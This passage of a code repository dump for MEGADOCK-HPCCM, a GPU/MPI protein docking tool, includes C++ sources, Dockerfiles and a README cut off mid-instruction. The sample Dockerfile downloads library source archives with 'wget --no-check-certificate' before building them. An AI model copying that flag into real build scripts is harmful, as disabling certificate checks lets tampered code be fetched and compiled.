\"parameter.h\"\n\nusing namespace std;\n\nclass ParameterPDB : public Parameter\n{\nprivate:\n friend class ControlPDB;\n friend class DockingPDB;\n friend class FFTProcessPDB;\n string _RecPDB_file;\n string _LigPDB_file;\n int _IO_flag[3];\n\nprotected:\n virtual void pdb_step();\n\npublic:\n ParameterPDB(Parallel *pparallel) : Parameter(pparallel) {\n#ifdef DEBUG\n cout << \"Constructing ParameterPDB.\\n\";\n#endif\n }\n virtual ~ParameterPDB() {\n#ifdef DEBUG\n cout << \"Destructing ParameterPDB.\\n\";\n#endif\n }\n virtual void process_args(int argc,char *argv[]);\n};\n\n#endif\n" }, { "alpha_fraction": 0.5615629553794861, "alphanum_fraction": 0.596092700958252, "avg_line_length": 31.33823585510254, "blob_id": "05ccddeff0fff23d2e827eac0f2e7b99a917d389", "content_id": "ba8cda9c6601ee35e6f1fc3e8197fa57509a9015", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Dockerfile", "length_bytes": 2201, "license_type": "permissive", "max_line_length": 176, "num_lines": 68, "path": "/sample/Dockerfile", "repo_name": "akiyamalab/megadock_hpccm", "src_encoding": "UTF-8", "text": "# \n# HPC Base image\n# \n# Contents:\n# CentOS 7 (default)\n# CUDA version 10.0 (default)\n# Mellanox OFED version 4.6-1.0.1.1 ('ofed=True')\n# Intel OPA driver/library (upstream, 'opa=True')\n# GNU compilers (upstream)\n# FFTW version 3.3.8 (default)\n# OpenMPI version 3.1.3 (default)\n# \n\nFROM nvidia/cuda:10.0-devel-centos7 AS devel\n\nRUN yum install -y \\\n cuda-samples-10-0 \\\n ssh && \\\n rm -rf /var/cache/yum/*\n\n# GNU compiler\nRUN yum install -y \\\n gcc \\\n gcc-c++ \\\n gcc-gfortran && \\\n rm -rf /var/cache/yum/*\n\n# FFTW version 3.3.8\nRUN yum install -y \\\n file \\\n make \\\n wget && \\\n rm -rf /var/cache/yum/*\nRUN mkdir -p /var/tmp && wget -q -nc --no-check-certificate -P /var/tmp ftp://ftp.fftw.org/pub/fftw/fftw-3.3.8.tar.gz && \\\n mkdir -p /var/tmp && tar -x -f /var/tmp/fftw-3.3.8.tar.gz -C /var/tmp -z 
&& \\\n cd /var/tmp/fftw-3.3.8 && CC=gcc CXX=g++ F77=gfortran F90=gfortran FC=gfortran ./configure --prefix=/usr/local/fftw --enable-float --enable-sse2 && \\\n make -j$(nproc) && \\\n make -j$(nproc) install && \\\n rm -rf /var/tmp/fftw-3.3.8.tar.gz /var/tmp/fftw-3.3.8\nENV LD_LIBRARY_PATH=/usr/local/fftw/lib:$LD_LIBRARY_PATH\n\n# OpenMPI version 3.1.3\nRUN yum install -y \\\n bzip2 \\\n file \\\n hwloc \\\n make \\\n numactl-devel \\\n openssh-clients \\\n perl \\\n tar \\\n wget && \\\n rm -rf /var/cache/yum/*\nRUN mkdir -p /var/tmp && wget -q -nc --no-check-certificate -P /var/tmp https://www.open-mpi.org/software/ompi/v3.1/downloads/openmpi-3.1.3.tar.bz2 && \\\n mkdir -p /var/tmp && tar -x -f /var/tmp/openmpi-3.1.3.tar.bz2 -C /var/tmp -j && \\\n cd /var/tmp/openmpi-3.1.3 && CC=gcc CXX=g++ F77=gfortran F90=gfortran FC=gfortran ./configure --prefix=/usr/local/openmpi --enable-mpi-cxx --with-cuda --without-verbs && \\\n make -j$(nproc) && \\\n make -j$(nproc) install && \\\n rm -rf /var/tmp/openmpi-3.1.3.tar.bz2 /var/tmp/openmpi-3.1.3\nENV LD_LIBRARY_PATH=/usr/local/openmpi/lib:$LD_LIBRARY_PATH \\\n PATH=/usr/local/openmpi/bin:$PATH\n\nCOPY ./megadock-scfa20 /workspace\n\nCOPY ./Makefile /workspace/Makefile\n\nRUN cd /workspace && \\\n make -j$(nproc)\n\n\n" }, { "alpha_fraction": 0.6028412580490112, "alphanum_fraction": 0.6071649193763733, "avg_line_length": 25.760330200195312, "blob_id": "10e10483c386213f692866f709f701dfdca7a944", "content_id": "819679638a29c5174253730968672d48c904e7b9", "detected_licenses": [ "Apache-2.0", "LicenseRef-scancode-proprietary-license" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 3238, "license_type": "permissive", "max_line_length": 162, "num_lines": 121, "path": "/megadock-scfa20/fft_process_table.h", "repo_name": "akiyamalab/megadock_hpccm", "src_encoding": "UTF-8", "text": "/*\n * Copyright (C) 2019 Tokyo Institute of Technology\n */\n\n//============================================================================//\n//\n// Software Name : MEGADOCK\n//\n// Class Name : FFTProcessTable\n//\n// Contact address : Tokyo Institute of Technology, AKIYAMA Lab.\n//\n//============================================================================//\n\n#ifndef FFTProcessTable_h\n#define FFTProcessTable_h 1\n\n#include \"exec_logger.h\"\n#include \"fft_process.h\"\n\nclass FFTProcessTable : public FFTProcess<ParameterTable>\n{\nprivate:\n#ifdef CUFFT\n //host side\n cufftHandle cufft_plan;\n cufftResult cufft_result;\n cufftComplex *CUFFTin_host;\n cufftComplex *CUFFTout_host;\n float *top_score_host;\n int *top_index_host;\n\n cudaStream_t _cuda_stream;\n\n //device side\n cufftComplex *CUFFTin_gpu;\n cufftComplex *CUFFTout_gpu;\n float *_FFT_rec_r_gpu;\n float *_FFT_rec_i_gpu;\n float *top_score_gpu;\n int *top_index_gpu;\n\n float *radius_core2_gpu;\n float *radius_surf2_gpu;\n float *_Charge_gpu;\n float *xd_gpu;\n float *yd_gpu;\n float *zd_gpu;\n float *grid_coord_gpu;\n float *atom_coord_rotated_gpu;\n float *grid_r_gpu;\n float *grid_i_gpu;\n float *atom_coord_orig_gpu;\n float *mole_center_coord_gpu;\n float *ligand_rotation_angle_gpu;\n\n\n#else\n\n fftwf_plan plan_fftw_forward;\n fftwf_plan plan_fftw_inverse;\n\n fftwf_complex *_FFTWin; \n fftwf_complex *_FFTWout;\n\n#endif\n\n ExecLogger *_exec_logger;\n vector<SortScore> _Select;\n int _Current_rot_angle_num;\nprotected:\n virtual void alloc_fft();\npublic:\n virtual void fft3d(const float &theta);\n FFTProcessTable(ExecLogger *pexec_logger,Parallel 
*pparallel,ParameterTable *pparameter, Receptor<ParameterTable> *preceptor, Ligand<ParameterTable> *pligand)\n : _exec_logger(pexec_logger),FFTProcess(pparallel, pparameter, preceptor, pligand) {\n\n#ifdef DEBUG\n cout << \"Constructing FFTProcessTable.\\n\";\n#endif\n //cout << \"FFTP const \"<< _parameter->_Num_sort <<endl; cout.flush();\n }\n virtual ~FFTProcessTable() {\n#ifdef DEBUG\n cout << \"Destructing FFTProcessTable.\\n\";\n#endif\n\n#ifdef CUFFT\n delete [] CUFFTin_host;\n delete [] CUFFTout_host;\n#else\n\n fftwf_free(_FFTWin);\n fftwf_free(_FFTWout);\n fftwf_cleanup();\n\n#endif\n\n vector<SortScore> tmp1;\n vector<SortScore> tmp2;\n _Select.swap(tmp1);\n _Top.swap(tmp2);\n }\n virtual void alloc_array(const int &num_fft);\n virtual void receptor_fft(float *grid_r,float *grid_i);\n#ifdef CUFFT\n virtual void cuda_fft(float *grid_r,float *grid_i,float *grid_coord,float *atom_coord_rotated,float *theta, size_t myid2);\n virtual void ligand_voxelization_on_gpu(float *theta, size_t myid2);\n virtual void ligand_data_transfer_gpu(float *grid_coord);\n#else\n virtual void ligand_preparation(float *grid_r,float *grid_i);\n virtual void convolution();\n virtual void score_sort();\n#endif\n virtual void fft_memory_free();\n virtual void rotation_index(const int &j) {\n _Current_rot_angle_num = j;\n }\n};\n\n#endif\n" }, { "alpha_fraction": 0.4004158675670624, "alphanum_fraction": 0.4117778241634369, "avg_line_length": 30.834514617919922, "blob_id": "991c4d574580ff822fb4697e79dc4a27a4400f9c", "content_id": "9031f6028b39561bf66d332b828dc05d3980328c", "detected_licenses": [ "Apache-2.0", "LicenseRef-scancode-proprietary-license" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 13466, "license_type": "permissive", "max_line_length": 98, "num_lines": 423, "path": "/megadock-scfa20/parameter_table.cpp", "repo_name": "akiyamalab/megadock_hpccm", "src_encoding": "UTF-8", "text": "/*\n * Copyright (C) 2019 Tokyo Institute of Technology\n */\n\n//============================================================================//\n//\n// Software Name : MEGADOCK\n//\n// Class Name : ParameterTable\n//\n// Contact address : Tokyo Institute of Technology, AKIYAMA Lab.\n//\n//============================================================================//\n\n#include \"parameter_table.h\"\n\n#include <string>\nusing namespace std;\n\n//============================================================================//\nvoid ParameterTable::process_args(int argc, char *argv[])\n//============================================================================//\n{\n#ifdef MPI_DP\n for( int i = 0 ; i < 3 ; i++ ) { //Receptor PDB, Ligand PDB, Outfile\n _IO_flag[i] = 0;\n }\n#endif\n\n optind = 1;\n int ch;\n\n std::string pdb_ext_r_b(\"_r_b.pdb\"); // for input support\n std::string pdb_ext_l_b(\"_l_b.pdb\");\n std::string pdb_ext_r_u(\"_r_u.pdb\");\n std::string pdb_ext_l_u(\"_l_u.pdb\");\n std::string detail_ext(\".detail\");\n std::string csv_ext(\".csv\");\n\n while( (ch = getopt(argc, argv,\n /*\n Line 1:input files\n Line 2:output\n Line 3:parameters\n Line 4:calculation options\n */\n#ifdef MPI_DP\n \"\\\n R:L:B:U:\\\n o:ON:t:E:\\\n a:b:e:d:F:v:\\\n Dhy:z:r:f:i:jkl:S:G:T:\"\n#else\n \"\\\n I:\\\n ON:t:E:\\\n a:b:e:d:F:v:\\\n Dhy:z:r:f:i:jkl:S:G:T:\"\n#endif\n )) != -1 ) {\n switch( ch ) {\n //-----------------------------------------------------------------\n // input PDB file -------------------------------------------------\n\n#ifdef MPI_DP\n case 'R':\n _RecPDB_file = 
optarg;\n _IO_flag[0] = 1;\n break;\n case 'L':\n _LigPDB_file = optarg;\n _IO_flag[1] = 1;\n break;\n case 'B': // for input support\n _RecPDB_file = optarg+pdb_ext_r_b;\n _IO_flag[0] = 1;\n _LigPDB_file = optarg+pdb_ext_l_b;\n _IO_flag[1] = 1;\n break;\n case 'U': // for input support\n _RecPDB_file = optarg+pdb_ext_r_u;\n _IO_flag[0] = 1;\n _LigPDB_file = optarg+pdb_ext_l_u;\n _IO_flag[1] = 1;\n break;\n\n //-----------------------------------------------------------------\n // output options -------------------------------------------------\n\n case 'o':\n _RLOut_file = optarg;\n _RLOut_file_detail = optarg+detail_ext;\n _RLOut_file_csv = optarg+csv_ext;\n if(_RLOut_file.length() > 4) {\n if(_RLOut_file.substr(_RLOut_file.length()-4)==\".out\") {\n _RLOut_file_detail = _RLOut_file.substr(0,_RLOut_file.length()-4)+detail_ext;;\n _RLOut_file_csv = _RLOut_file.substr(0,_RLOut_file.length()-4)+csv_ext;;\n }\n }\n _IO_flag[2] = 1;\n break;\n#else\n case 'I':\n _Table_file = optarg;\n break;\n#endif\n\n //-----------------------------------------------------------------\n // output options -------------------------------------------------\n\n case 'O':\n detail_output_flag = 1;\n break;\n case 'N':\n _Num_output = atoi(optarg);\n _Num_output_flag = 1;\n cout << \"# Number of output = \" << _Num_output << endl;\n break;\n case 't':\n _Num_sort = atoi(optarg);\n cout << \"# Set number of scores per one angle = \" << _Num_sort << endl;\n break;\n case 'E':\n calc_time_log_output_flag = atoi(optarg);\n break;\n case 'i':\n calc_id = optarg;\n break;\n\n //-----------------------------------------------------------------\n // setting parameters ---------------------------------------------\n\n case 'e':\n _Elec_ratio = atof(optarg);\n if (f1_flag == 1) {\n printf(\"Do not use -f 1 and -e option at the same time.\\n\");\n exit(1);\n }\n f1_flag = -1; // do not use rPSC only\n cout << \"# Set electric term ratio = \"<< _Elec_ratio << endl;\n break;\n case 'd':\n _ACE_ratio = atof(optarg);\n if (f1_flag == 1 || f2_flag == 1) {\n printf(\"Do not use -f 1 or 2 and -d option at the same time.\\n\");\n exit(1);\n }\n f1_flag = -1; // do not use rPSC only\n f2_flag = -1; // do not use rPSC and Elec function\n cout << \"# Set ACE term ratio = \" << _ACE_ratio << endl;\n break;\n case 'a':\n _rPSC_param_rec_core = atof(optarg); // Receptor core\n break;\n case 'b':\n _rPSC_param_lig_core = atof(optarg); // Ligand core\n break;\n case 'F':\n _Num_fft = atoi(optarg);\n _Num_grid = _Num_fft / 2;\n _Num_fft_flag = 1;\n cout << \"# Number of FFT N = \" << _Num_fft << endl;\n break;\n case 'v':\n grid_width = atof(optarg);\n cout << \"# Set voxel size = \" << grid_width << endl;\n break;\n\n //-----------------------------------------------------------------\n // setting calculation mode ---------------------------------------\n case 'T':\n _Num_thread_limit = atoi(optarg);\n if(_Num_thread_limit<1) {\n printf(\"Please set a positive number (Number of cores).\\n\");\n exit(1);\n }\n omp_set_num_threads(_Num_thread_limit);\n break;\n case 'G':\n _Num_GPU_limit = atoi(optarg);\n if(_Num_GPU_limit<0) {\n printf(\"Please set a non-negative number (Number of GPUs you want to use).\\n\");\n exit(1);\n }\n break;\n case 'f':\n _Score_func = atoi(optarg);\n cout << \"#Set score Function = \" << _Score_func << endl;\n assert( 1 <= _Score_func && _Score_func <= 3 );\n if(_Score_func == 1) {\n _Elec_ratio = 0.0;\n _ACE_ratio = 0.0;\n if (f1_flag == -1) {\n printf(\"Do not use -f 1 and -e/-d option at the same 
time.\\n\");\n exit(1);\n }\n f1_flag = 1;\n } else if(_Score_func == 2) {\n _ACE_ratio = 0.0;\n if (f2_flag == -1) {\n printf(\"Do not use -f 2 and -d option at the same time.\\n\");\n exit(1);\n }\n f2_flag = 1;\n }\n _Score_func = 3;\n break;\n case 'r':\n _Rotation_angle_set = atoi(optarg);\n if(_Rotation_angle_set == 54000) {\n cout << \"# Set 54,000 rotational angles (6 degree)\"<< endl;\n } else if(_Rotation_angle_set == 1) {\n cout << \"# Set 1 rotational angle (test mode)\"<< endl;\n } else if(_Rotation_angle_set == 3) {\n cout << \"# Set 3 rotational angle (test mode)\"<< endl;\n } else if(_Rotation_angle_set == 24) {\n cout << \"# Set 24 rotational angles (test mode)\"<< endl;\n } else if(_Rotation_angle_set == 360) {\n cout << \"# Set 360 rotational angles (test mode)\"<< endl;\n }\n break;\n case 'D':\n _Rotation_angle_set = 54000;\n cout << \"# Set 54,000 rotational angles (6 degree)\"<< endl;\n break;\n\n //-----------------------------------------------------------------\n // help -----------------------------------------------------------\n case 'j':\n tem_flag1 = 1;\n break;\n case 'k':\n tem_flag2 = 1;\n break;\n case 'S':\n lig_elec_serial_flag = atoi(optarg);\n break;\n case 'l':\n fft_base_set = atoi(optarg);\n break;\n\n case 'h':\n break;\n }\n }\n#ifdef MPI_DP\n pdb_step();\n#endif\n}\n\n#ifdef MPI_DP\n//============================================================================//\nvoid ParameterTable::pdb_step()\n//============================================================================//\n{\n if( !_IO_flag[0] ) {\n cerr << \"[ERROR] Receptor PDB file is not specified!!\" << endl;\n usage();\n exit(1);\n }\n\n if( !_IO_flag[1] ) {\n cerr << \"[ERROR] Ligand PDB file is not specified!!\" << endl;\n usage();\n exit(1);\n }\n\n if( !_IO_flag[2] ) {\n string rfile = _RecPDB_file;\n string lfile = _LigPDB_file;\n string ofile;\n int ipr;\n int ipl;\n\n while(1) {\n ipr = rfile.rfind(\"/\");\n\n if( ipr == (int) string::npos ) {\n break;\n } else {\n rfile = rfile.substr(ipr+1);\n }\n }\n\n ipr = rfile.rfind(\".\");\n rfile = rfile.substr(0,ipr);\n rfile = rfile + \"-\";\n\n while(1) {\n ipl = lfile.rfind(\"/\");\n\n if( ipl == (int) string::npos ) {\n break;\n } else {\n lfile = lfile.substr(ipl+1);\n }\n }\n\n ipl = lfile.rfind(\".\");\n lfile = lfile.substr(0,ipl);\n\n ofile = rfile + lfile + \".out\";\n _RLOut_file = ofile;\n ofile = rfile + lfile + \".detail\";\n _RLOut_file_detail = ofile;\n ofile = rfile + lfile + \".csv\";\n _RLOut_file_csv = ofile;\n }\n\n //cout << \"#Receptor = \" << _RecPDB_file << endl;\n //cout << \"#Ligand = \" << _LigPDB_file << endl;\n cout << \"# Output file = \" << _RLOut_file << endl;\n\n return;\n}\n#endif\n\n//============================================================================//\nvoid ParameterTable::initialize(ParameterTable *pparameter)\n//============================================================================//\n{\n#ifndef MPI_DP\n _Table_file = pparameter->_Table_file;\n#endif\n _RLOut_file = pparameter->_RLOut_file;\n _RLOut_file_detail = pparameter->_RLOut_file_detail; \n _RLOut_file_csv = pparameter->_RLOut_file_csv;\n calc_id = pparameter->calc_id;\n detail_output_flag = pparameter->detail_output_flag;\n calc_time_log_output_flag = pparameter->calc_time_log_output_flag;\n\n _Num_grid = pparameter->_Num_grid;\n _Num_fft = pparameter->_Num_fft;\n _Num_fft_flag = pparameter->_Num_fft_flag;\n _Num_atom_max = pparameter->_Num_atom_max;\n _Num_output = pparameter->_Num_output;\n _Num_output_flag = 
pparameter->_Num_output_flag;\n _Num_thread_limit = pparameter->_Num_thread_limit;\n _Num_GPU_limit = pparameter->_Num_GPU_limit;\n\n _Score_func = pparameter->_Score_func;\n _Num_sort = pparameter->_Num_sort;\n _Elec_ratio = pparameter->_Elec_ratio;\n _ACE_ratio = pparameter->_ACE_ratio;\n grid_width = pparameter->grid_width;\n ligand_max_edge = pparameter->ligand_max_edge;\n _Rotation_angle_set = pparameter->_Rotation_angle_set;\n fft_base_set = pparameter->fft_base_set;\n lig_elec_serial_flag = pparameter->lig_elec_serial_flag;\n fft_library_type = pparameter->fft_library_type;\n\n tem_flag1 = pparameter->tem_flag1;\n tem_flag2 = pparameter->tem_flag2;\n tem_flag3 = pparameter->tem_flag3;\n tem_flag4 = pparameter->tem_flag4;\n f1_flag = pparameter->f1_flag;\n f2_flag = pparameter->f2_flag;\n \n _Old_voxel_flag = pparameter->_Old_voxel_flag;\n _Grid_space_rec = pparameter->_Grid_space_rec;\n _Grid_space_lig = pparameter->_Grid_space_lig;\n \n _rPSC_param_rec_core = pparameter->_rPSC_param_rec_core;\n _rPSC_param_lig_core = pparameter->_rPSC_param_lig_core;\n\n _Num_rot_angles = pparameter->_Num_rot_angles;\n _Charmmr = pparameter->_Charmmr;\n _Charmmc = pparameter->_Charmmc;\n _ACE = pparameter->_ACE;\n\n\n _Zangle = new float[_Num_rot_angles*3];\n for( int i = 0 ; i < _Num_rot_angles*3 ; i++ ) {\n _Zangle[i] = pparameter->_Zangle[i];\n }\n}\n\n//============================================================================//\nvoid ParameterTable::output_file_name(const string rec_file, const string lig_file)\n//============================================================================//\n{\n string rfile = rec_file;\n string lfile = lig_file;\n string ofile;\n int ipr;\n int ipl;\n\n while(1) {\n ipr = rfile.rfind(\"/\");\n\n if( ipr == (int) string::npos ) {\n break;\n } else {\n rfile = rfile.substr(ipr+1);\n }\n }\n\n ipr = rfile.rfind(\".\");\n rfile = rfile.substr(0,ipr);\n rfile = rfile + \"-\";\n\n while(1) {\n ipl = lfile.rfind(\"/\");\n\n if( ipl == (int) string::npos ) {\n break;\n } else {\n lfile = lfile.substr(ipl+1);\n }\n }\n\n ipl = lfile.rfind(\".\");\n lfile = lfile.substr(0,ipl);\n\n ofile = rfile + lfile + \".out\";\n _RLOut_file = ofile;\n ofile = rfile + lfile + \".detail\";\n _RLOut_file_detail = ofile;\n ofile = rfile + lfile + \".csv\";\n _RLOut_file_csv = ofile;\n\n return;\n}\n" }, { "alpha_fraction": 0.7313432693481445, "alphanum_fraction": 0.7611940503120422, "avg_line_length": 12.399999618530273, "blob_id": "1933bbffda110b492db54fa2cbe659c9ce77b154", "content_id": "162f7746904e1eac6f66da59b729ac1e72dd7426", "detected_licenses": [], "is_generated": false, "is_vendor": true, "language": "Dockerfile", "length_bytes": 67, "license_type": "permissive", "max_line_length": 22, "num_lines": 5, "path": "/.github/workflows/Dockerfile.hpccm", "repo_name": "akiyamalab/megadock_hpccm", "src_encoding": "UTF-8", "text": "FROM python:3-alpine\n\nRUN pip3 install hpccm\n\nENTRYPOINT [\"hpccm\"]\n" }, { "alpha_fraction": 0.5331347584724426, "alphanum_fraction": 0.5420699715614319, "avg_line_length": 22.98214340209961, "blob_id": "4b82b7e6701396d86c2db2dc98aa74fac11ef499", "content_id": "736be6a971ae9624b8577e4ecff4511ee819681f", "detected_licenses": [ "Apache-2.0", "LicenseRef-scancode-proprietary-license" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1343, "license_type": "permissive", "max_line_length": 80, "num_lines": 56, "path": "/megadock-scfa20/application.h", "repo_name": "akiyamalab/megadock_hpccm", "src_encoding": "UTF-8", "text": 
"/*\n * Copyright (C) 2019 Tokyo Institute of Technology\n */\n\n//============================================================================//\n//\n// Software Name : MEGADOCK\n//\n// Class Name : Application\n//\n// Contact address : Tokyo Institute of Technology, AKIYAMA Lab.\n//\n//============================================================================//\n\n#ifndef Application_h\n#define Application_h 1\n\n#include \"cpu_time.h\"\n#include \"exec_logger.h\"\n#include \"control_pdb.h\"\n#include \"control_table.h\"\n\nclass Application\n{\nprivate:\n Application(Application &c) {}\n const Application & operator=(const Application &c);\n\n int nproc2;\n int device_count_gpu;\n Parallel **_parallels;\n ExecLogger **_exec_loggers;\n ControlTable **_controls;\n ParameterTable **_parameters;\n\npublic:\n Application(const int nproc2) : nproc2(nproc2) {}\n virtual ~Application() {\n#pragma omp parallel for\n for (int i = 0; i < nproc2; i++) {\n delete _exec_loggers[i];\n delete _controls[i];\n delete _parallels[i];\n delete _parameters[i];\n }\n\n delete [] _parallels;\n delete [] _exec_loggers;\n delete [] _controls;\n delete [] _parameters;\n }\n virtual void initialize();\n virtual int application(int argc, char *argv[], int myid2);\n};\n\n#endif\n" }, { "alpha_fraction": 0.5989247560501099, "alphanum_fraction": 0.6075268983840942, "avg_line_length": 27.615385055541992, "blob_id": "5050a4180332ae5f9dcb7c35c55d4b93a528c96b", "content_id": "7019a11dfe2bd235351d472404be0be3817670b4", "detected_licenses": [ "Apache-2.0", "LicenseRef-scancode-proprietary-license" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1860, "license_type": "permissive", "max_line_length": 96, "num_lines": 65, "path": "/megadock-scfa20/control.h", "repo_name": "akiyamalab/megadock_hpccm", "src_encoding": "UTF-8", "text": "/*\n * Copyright (C) 2019 Tokyo Institute of Technology\n */\n\n//============================================================================//\n//\n// Software Name : MEGADOCK\n//\n// Class Name : Control\n//\n// Contact address : Tokyo Institute of Technology, AKIYAMA Lab.\n//\n//============================================================================//\n\n#ifndef Control_h\n#define Control_h 1\n\n#include \"parallel.h\"\n#include \"receptor.h\"\n#include \"ligand.h\"\n#include \"docking_pdb.h\"\n#include \"docking_table.h\"\n\nusing namespace std;\n\ntemplate<class P, class D> class Control\n{\nprivate:\n Control(Control &c) {}\n const Control & operator=(const Control &c);\nprotected:\n Parallel *_parallel;\n P *_parameter;\n Receptor<P> *_receptor;\n Ligand<P> *_ligand;\n D *_docking;\n virtual void gridtable_11base_normal(int &ngrid,vector<int> &ngrid_table);\n virtual void gridtable_13base_normal(int &ngrid,vector<int> &ngrid_table);\n virtual void gridtable_07base_normal(int &ngrid,vector<int> &ngrid_table);\n virtual void gridtable_fftw_custom(int &ngrid,vector<int> &ngrid_table);\n virtual void gridtable_cufft_custom(int &ngrid,vector<int> &ngrid_table);\n virtual void autogridr(const int &ngrid,vector<int> &ngrid_table) = 0;\n virtual void autogridl(const int &ngrid,vector<int> &ngrid_table) = 0;\n virtual void checkgridr() = 0;\n virtual void checkgridl() = 0;\npublic:\n Control(Parallel *pparallel) : _parallel(pparallel) {\n#ifdef DEBUG\n cout << \"Constructing Control.\\n\";\n#endif\n }\n Control(Parallel *pparallel, P *pparameter) : _parallel(pparallel), _parameter(pparameter) {\n#ifdef DEBUG\n cout << \"Constructing Control.\\n\";\n#endif\n 
}\n virtual ~Control() {\n#ifdef DEBUG\n cout << \"Destructing Control.\\n\";\n#endif\n }\n virtual void execute() = 0;\n};\n\n#endif\n" }, { "alpha_fraction": 0.6872357726097107, "alphanum_fraction": 0.7027768492698669, "avg_line_length": 35.31120300292969, "blob_id": "a3bcb9262de743e99ea18fd66520c25dee239093", "content_id": "3678b3a472069805928f19f34475f0dbcca7b603", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 8843, "license_type": "permissive", "max_line_length": 253, "num_lines": 241, "path": "/README.md", "repo_name": "akiyamalab/megadock_hpccm", "src_encoding": "UTF-8", "text": "# MEGADOCK-HPCCM\n\n## Description\n\nMEGADOCK-HPCCM is an HPC container-building workflow for the [MEGADOCK](https://github.com/akiyamalab/MEGADOCK) application on HPC environments, using the [HPCCM (HPC Container Maker)](https://github.com/NVIDIA/hpc-container-maker/) framework.\nIt generates container specification (recipe) files in both [Dockerfile](https://docs.docker.com/engine/reference/builder/) and [Singularity definition](https://sylabs.io/guides/3.3/user-guide/definition_files.html) formats from one simple Python recipe.\nDependent libraries (GPU, OpenMPI, FFTW, InfiniBand, Intel Omni-Path) are properly configured by setting parameters, so the MEGADOCK application can be used on HPC environments.\nIt gives users an easier way to use MEGADOCK application containers across multiple HPC environments, where the specifications of hosts and containers often differ.\n\n## Requirements\n\n- [NVIDIA GPU devices, drivers](https://www.nvidia.com/)\n- [HPC Container Maker](https://github.com/NVIDIA/hpc-container-maker/)\n- [Docker](https://www.docker.com/) (if you use Docker)\n- [Singularity](https://sylabs.io/) (if you use Singularity)\n\n## Repository Overview\n```\n.\n├── data # \n│ └── ... # sample of input file (.pdb, .table)\n├── sample # \n│ ├── Dockerfile # for general Docker environments\n│ ├── singularity_ompi-2-1-2_opa.def # for TSUBAME3.0 (ompi=2.1.2, opa=True)\n│ └── singularity_ompi-2-1-6_ofed.def # for ABCI (ompi=2.1.6, ofed=True)\n├── script # \n│ └── makeTable.sh # script for generating input table (.table)\n├── megadock-scfa20 # source code of MEGADOCK 5.0 (alpha)\n├── megadock_hpccm.py # MEGADOCK-HPCCM for HPCCM framework\n├── Makefile # \n└── README.md # this document\n\n# The following directories will be generated after running scripts\n.\n├── table # directory for storing metadata files\n└── out # directory for storing output files\n```\n\n----\n\n## Quick Links\n\n- [MEGADOCK-HPCCM](#megadock-hpccm)\n - [Description](#description)\n - [Requirements](#requirements)\n - [Repository Overview](#repository-overview)\n - [Quick Links](#quick-links)\n - [Docker Environment](#docker-environment)\n - [Requirements](#requirements-1)\n - [1. Setting up (HPCCM)](#1-setting-up-hpccm)\n - [2. Generate Dockerfile](#2-generate-dockerfile)\n - [3. Build Docker image](#3-build-docker-image)\n - [4. Test with sample protein-protein pairs](#4-test-with-sample-protein-protein-pairs)\n - [5. Test with ZLAB benchmark dataset](#5-test-with-zlab-benchmark-dataset)\n - [Singularity Environment](#singularity-environment)\n - [Requirements](#requirements-2)\n - [1. Setting up (HPCCM)](#1-setting-up-hpccm-1)\n - [2. Generate Singularity Definition](#2-generate-singularity-definition)\n - [3. Build Singularity image](#3-build-singularity-image)\n - [4. Test with sample protein-protein pairs](#4-test-with-sample-protein-protein-pairs-1)\n - [5. 
Test with ZLAB benchmark dataset](#5-test-with-zlab-benchmark-dataset-1)\n\n----\n\n## Docker Environment\n\n### Requirements\n\n- pip, python (for HPCCM)\n- docker ( > 19.03 )\n - or `nvidia-docker` for GPU support\n\n### 1. Setting up (HPCCM)\n\n```sh\n# install hpccm\nsudo pip install hpccm\n\n# clone MEGADOCK-HPCCM repository\ngit clone https://github.com/akiyamalab/megadock_hpccm.git\ncd megadock_hpccm\n```\n\n### 2. Generate Dockerfile\n\n``` sh\n# generate 'Dockerfile' from hpccm recipe\nhpccm --recipe megadock_hpccm.py --format docker > Dockerfile\n\n## or adding 'userarg' for specifying library versions\nhpccm --recipe megadock_hpccm.py --format docker --userarg ompi=2.1.2 fftw=3.3.8 > Dockerfile\n\n## Available userargs:\n## ompi=${ompi_version} : version of OpenMPI library\n## fftw=${fftw_version} : version of FFTW library\n```\n\n### 3. Build Docker image\n\n```sh\n# build a container image from Dockerfile\ndocker build . -f Dockerfile -t megadock:hpccm\n```\n\n### 4. Test with sample protein-protein pairs\n\n```sh\n# run with host gpus\ndocker run --rm -it --gpus all \\\n -v `pwd`/data:/data megadock:hpccm \\\n mpirun --allow-run-as-root -n 2 /workspace/megadock-gpu-dp -tb /data/SAMPLE.table\n```\n\n### 5. Test with ZLAB benchmark dataset\n\n```sh\n# clone MEGADOCK-HPCCM repository\ngit clone https://github.com/akiyamalab/megadock_hpccm.git\ncd megadock_hpccm\n\n# download benchmark dataset (ZDOCK Benchmark 5.0)\nmkdir -p data\nwget https://zlab.umassmed.edu/benchmark/benchmark5.tgz\ntar xvzf benchmark5.tgz -C data\nrm -f benchmark5.tgz\n\n# create docking table using script (only 100 pairs)\nINTERACTIVE=1 TABLE_ITEM_MAX=100 RUNTIME_RELATIVE_ROOT=/ script/makeTable.sh . data/benchmark5/structures/ \\*_r_b.pdb \\*_l_b.pdb test100pairs\n\n# Note: \n# - unset the ${TABLE_ITEM_MAX} variable to remove the limit on the number of docking calculations (all-to-all)\n# - if you need to change the repository root path at runtime, use ${RUNTIME_RELATIVE_ROOT} to modify paths when generating the table.\n\n# run\ndocker run --rm -it --gpus all \\\n -v `pwd`/data:/data -v `pwd`/table:/table -v `pwd`/out:/out \\\n megadock:hpccm \\\n mpirun --allow-run-as-root -n 2 -x OMP_NUM_THREADS=20 \\\n /workspace/megadock-gpu-dp -tb /table/test100pairs/test100pairs.table\n```\n\n----\n\n## Singularity Environment\n\n### Requirements\n\n- pip, python (for HPCCM)\n- singularity\n - require `singularity exec` command on HPC system\n - require privilege for `sudo singularity build` or `singularity build --fakeroot` (>= 3.3)\n\nNote: The following commands should be executed on your local environment, where you have system privileges.\n\n### 1. Setting up (HPCCM)\n\n```sh\n# install hpccm\nsudo pip install hpccm\n\n# clone MEGADOCK-HPCCM repository\ngit clone https://github.com/akiyamalab/megadock_hpccm.git\ncd megadock_hpccm\n```\n\n### 2. Generate Singularity Definition\n\n``` sh\n# generate 'singularity.def' from hpccm recipe\nhpccm --recipe megadock_hpccm.py --format singularity > 